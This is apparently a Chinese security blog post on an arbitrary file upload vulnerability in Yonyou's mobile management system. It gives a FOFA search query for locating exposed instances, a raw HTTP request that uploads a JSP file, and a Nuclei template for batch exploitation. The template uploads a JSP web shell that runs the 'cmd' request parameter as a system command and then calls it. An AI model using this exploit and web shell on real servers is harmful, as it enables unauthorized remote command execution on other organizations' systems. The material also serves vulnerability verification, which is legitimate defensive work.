用友移动管理系统 任意文件上传

一、免责声明：

本次文章仅限个人学习使用，如有非法用途均与作者无关，且行且珍惜；由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号望雪阁及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。谢谢！

二、产品介绍：

三、资产梳理：

fofa：app=“用友-移动系统管理”

四、漏洞复现：

POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close
Content-Length: 202

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword

hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--

木马地址：http://127.0.0.1/maupload/apk/a.jsp

五、Nuclei POC：

nuclei批量检测：

id: yongyou_mobile_files_upload
info:
  name: yongyou_mobile_files_upload
  author: joyboy
  severity: critical
  description: http://xxx.xxx.xxx/maportal/appmanager/uploadApk.do?pk_obj=
  metadata:
    max-request: 1
    fofa-query: app="用友-移动系统管理"
    verified: true
  tags: 用友-移动系统管理,files_upload

requests:
  - raw:
      - |-
        POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3

        ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
        Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
        Content-Type: application/msword

        <%@ page import="java.util.*,java.io.*,java.net.*"%>
        <%
          Process p;
          out.println("whoami:");
          if(System.getProperty("os.name").toLowerCase().indexOf("windows") >= 0){
            //p = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", "whoami"});
            p = Runtime.getRuntime().exec(request.getParameter("cmd"));
          }else{
            p = Runtime.getRuntime().exec("whoami");
          }
          OutputStream os = p.getOutputStream();
          InputStream in = p.getInputStream();
          DataInputStream dis = new DataInputStream(in);
          String disr = dis.readLine();
          while ( disr != null ) {
            out.println(disr);
            disr = dis.readLine();
          }
        %>
        ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
      - |+
        GET /maupload/apk/a.jsp?cmd=whoami HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

    req-condition: true
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains((body_2), "whoami") && status_code_2 == 200'